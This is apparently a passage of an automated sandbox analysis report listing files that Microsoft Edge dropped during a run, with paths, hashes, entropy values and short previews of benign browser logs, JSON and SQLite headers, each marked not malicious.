Preview:	2024/11/25-18:25:30.085 dc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/25-18:25:30.090 dc4 Recovering log #3.2024/11/25-18:25:30.091 dc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.13462461946699
Encrypted:	false
SSDEEP:	6:HApTSVq2PN723oH+Tcwt7Uh2ghZIFUt8YAp0gZmw+YApDIkwON723oH+Tcwt7Uh9:gsVvVaYebIhHh2FUt87Sg/+7xI5OaYeQ
MD5:	EF6369664AC828777230B59B2F7F9450
SHA1:	F48CABFD3133D9C2EC06E14E667A1157FBC12B9D
SHA-256:	4794687E0FCD88B1E05862FA35EF5E59597D15E3AFA5650093CE6587CE84D612
SHA-512:	78A255FC45DBDA6F5A0B675A3FC655A29E9668D4D02DC05FD67182103016AF2502FCC0B0320A8D7DE3C1B9CC67970596705B643D96D93A09F0B9CAE181E24FF8
Malicious:	false
Preview:	2024/11/25-18:25:30.085 dc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/25-18:25:30.090 dc4 Recovering log #3.2024/11/25-18:25:30.091 dc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	438
Entropy (8bit):	5.252794204966242
Encrypted:	false
SSDEEP:	12:goQN+vVaYebvqBQFUt87ofm/+7oCV5OaYebvqBvJ:ntVaYebvZg80fskOaYebvk
MD5:	B47D4FE1D3C13E5A1883650597EDAA0F
SHA1:	4660B146253835183C72B46ED77BB5F9C77B71C0
SHA-256:	C992C6A5F33FC896C031A1AD779F00BA95F9621AB7A49671FE29EA99265F11B0
SHA-512:	3CEBC59AE2DC426630E9524E66FDA596F923A9EDC4700813A1E0F1B321BC9547D7FC6D5099D3E22BD9B95A92700604F977138C22EBBBF44B1ED2E7186FE81CBC
Malicious:	false
Preview:	2024/11/25-18:25:31.647 1d4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/25-18:25:31.649 1d4c Recovering log #3.2024/11/25-18:25:31.652 1d4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	438
Entropy (8bit):	5.252794204966242
Encrypted:	false
SSDEEP:	12:goQN+vVaYebvqBQFUt87ofm/+7oCV5OaYebvqBvJ:ntVaYebvZg80fskOaYebvk
MD5:	B47D4FE1D3C13E5A1883650597EDAA0F
SHA1:	4660B146253835183C72B46ED77BB5F9C77B71C0
SHA-256:	C992C6A5F33FC896C031A1AD779F00BA95F9621AB7A49671FE29EA99265F11B0
SHA-512:	3CEBC59AE2DC426630E9524E66FDA596F923A9EDC4700813A1E0F1B321BC9547D7FC6D5099D3E22BD9B95A92700604F977138C22EBBBF44B1ED2E7186FE81CBC
Malicious:	false
Preview:	2024/11/25-18:25:31.647 1d4c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/25-18:25:31.649 1d4c Recovering log #3.2024/11/25-18:25:31.652 1d4c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\09f5a610-dbe4-496e-b570-c0fff93993b9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\13ae2b37-e606-43ad-8c45-b7fecde78041.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
MD5:	807419CA9A4734FEAF8D8563A003B048
SHA1:	A723C7D60A65886FFA068711F1E900CCC85922A6
SHA-256:	AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
SHA-512:	F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
MD5:	807419CA9A4734FEAF8D8563A003B048
SHA1:	A723C7D60A65886FFA068711F1E900CCC85922A6
SHA-256:	AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
SHA-512:	F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3c600.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a3c2de98-76ec-4690-a7f3-811babacfe41.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a9c0e354-3538-436b-b7e2-20aec4b90753.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	423
Entropy (8bit):	5.238845461667056
Encrypted:	false
SSDEEP:	12:g5VvVaYebvqBZFUt87s75g/+7K0I5OaYebvqBaJ:y5VaYebvyg8k5XSOaYebvL
MD5:	AE923900FE7C05BB6B85ABB3AB9112A2
SHA1:	FE3699794D4523B523225BEA8EC69BA525364BA8
SHA-256:	21CF840375093B22EFEDF62339B9A6C3CB3BE6AEAE914031F1B4396D1D6D959B
SHA-512:	203909458628EB483EC5FED78C8E8CF039D539506EBDB0F31DB0314A1AD81B307C5AF2A82CCCA89205C1610E341FBE5545A6B3DC7282F8E8E6EF622F5C575567
Malicious:	false
Preview:	2024/11/25-18:25:48.313 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/25-18:25:48.314 d34 Recovering log #3.2024/11/25-18:25:48.317 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	423
Entropy (8bit):	5.238845461667056
Encrypted:	false
SSDEEP:	12:g5VvVaYebvqBZFUt87s75g/+7K0I5OaYebvqBaJ:y5VaYebvyg8k5XSOaYebvL
MD5:	AE923900FE7C05BB6B85ABB3AB9112A2
SHA1:	FE3699794D4523B523225BEA8EC69BA525364BA8
SHA-256:	21CF840375093B22EFEDF62339B9A6C3CB3BE6AEAE914031F1B4396D1D6D959B
SHA-512:	203909458628EB483EC5FED78C8E8CF039D539506EBDB0F31DB0314A1AD81B307C5AF2A82CCCA89205C1610E341FBE5545A6B3DC7282F8E8E6EF622F5C575567
Malicious:	false
Preview:	2024/11/25-18:25:48.313 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/25-18:25:48.314 d34 Recovering log #3.2024/11/25-18:25:48.317 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.180960754010135
Encrypted:	false
SSDEEP:	6:HApByX9+q2PN723oH+TcwtpIFUt8YApRvXJZmw+YApRvX9VkwON723oH+Tcwta/o:gg4vVaYebmFUt877/J/+77/D5OaYebaQ
MD5:	245BEFFEA017FE9420799AC144A1869E
SHA1:	F04C3067B8AF8E71E068C7101996F81C15F370DD
SHA-256:	A0B8F8E69081A8911AD34D767929F596FFF3EEF9C2FCDBBFB5DE610BBE88663E
SHA-512:	5CD4C5B78AD7B56CE9ECAE9F9F7A5BCDC4F134E3C9F9B092429C0C546CAB76DAB6CC53EFBEF5022F5B10FC3C070BD3C3B126D1619EF5AC6FACBEEB13DF1084C7
Malicious:	false
Preview:	2024/11/25-18:25:29.984 1e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/25-18:25:29.985 1e28 Recovering log #3.2024/11/25-18:25:29.985 1e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	332
Entropy (8bit):	5.180960754010135
Encrypted:	false
SSDEEP:	6:HApByX9+q2PN723oH+TcwtpIFUt8YApRvXJZmw+YApRvX9VkwON723oH+Tcwta/o:gg4vVaYebmFUt877/J/+77/D5OaYebaQ
MD5:	245BEFFEA017FE9420799AC144A1869E
SHA1:	F04C3067B8AF8E71E068C7101996F81C15F370DD
SHA-256:	A0B8F8E69081A8911AD34D767929F596FFF3EEF9C2FCDBBFB5DE610BBE88663E
SHA-512:	5CD4C5B78AD7B56CE9ECAE9F9F7A5BCDC4F134E3C9F9B092429C0C546CAB76DAB6CC53EFBEF5022F5B10FC3C070BD3C3B126D1619EF5AC6FACBEEB13DF1084C7
Malicious:	false
Preview:	2024/11/25-18:25:29.984 1e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/25-18:25:29.985 1e28 Recovering log #3.2024/11/25-18:25:29.985 1e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.267727947473452
Encrypted:	false
SSDEEP:	384:L/2qOB1nxCkM3SA1LyKOMq+8iP5GDHP/0jMVumX:Kq+n0J391LyKOMq+8iP5GLP/0W
MD5:	4DC56E98D1E337BC6CA8FADB1130C23B
SHA1:	32219DA3E2E4498FE2CFF6DD18191CE780627A3E
SHA-256:	31BABCDC410FF60B8522BF78906E1F511BD2202B16DFF1E7FCAB475630C53BFE
SHA-512:	C51DEC267E6EE6D29ABF0C6BF0E83DC2FFDC1609E24926473C8DB0C75B48AA5FA5A985C2399EE5671429053712303EFD14B39D361C07365D924BDAB831FFC643
Malicious:	false
Preview:	SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4668695817897862
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0TK:v7doKsKuKZKlZNmu46yjx0u
MD5:	DD5C4C84DF7558337ECDB6AFD08B28DC
SHA1:	5888F9AAF50B296DAC99B30C8BFDDA8EF098F167
SHA-256:	44C0F4BAFF7940F819D8CA76B1C9AD9DF591F60F463AC1470707B2C729A1FAF8
SHA-512:	53A7A0A238D9A47077BBEE82A28B80000126AB2A1A9460AE168261D0D63FAFA5BE19891AAC33E2048B7556A95D2AE8596CEF86F89057617F881DC47B9ABCADFD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a82f21e1-d027-4ed2-8623-d9ef14e20358.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17390), with no line terminators
Category:	dropped
Size (bytes):	17392
Entropy (8bit):	5.487515421673198
Encrypted:	false
SSDEEP:	384:st1PGQSu4+scKCDvCfiKq70bSzwiXmbGJQwNg:sjOXutKC+ZbGaUg
MD5:	E31EDDA69A60B955C506D5138F777412
SHA1:	7CFFB0B0EC70DC07C1424183808CB0BFBD53EB26
SHA-256:	13BACCC3A26474041BFCFAA46ACBD1A4E782015A3752E5FB6B657A627DFECA52
SHA-512:	2A8E7157E5622A69617E3599BBED3143CC50AB690732FDC0892E4CC1C44117D2142EFB8FD646E7DB6EF012E277D2BABC66E1C3F82F945E3069DD7C68F7FAD541
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c1b217ca-752a-4031-ac16-41abd127091f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17555), with no line terminators
Category:	dropped
Size (bytes):	17557
Entropy (8bit):	5.484311380013052
Encrypted:	false
SSDEEP:	384:st1PGQSu4+scKCDvCfiKq70bSzwiXmbGJQwG3g:sjOXutKC+ZbGaXg
MD5:	BBAC90E92B9F2290E6DE03F74E149D81
SHA1:	1422682A18599395923914F3DAB1B09CE863E098
SHA-256:	5B246425665708FB39967A27E39BADE86BD7631F2098E933EC7301739645AEDC
SHA-512:	5C68C29A71B4E69589C40FB7F1150BF109DA059331E24AE2B9B8A2B81874D3D9283F96DDF112FE5788D0099716386EA8508139DD12C87947A3EA8129EB29CBD8
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377050730666443","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_pat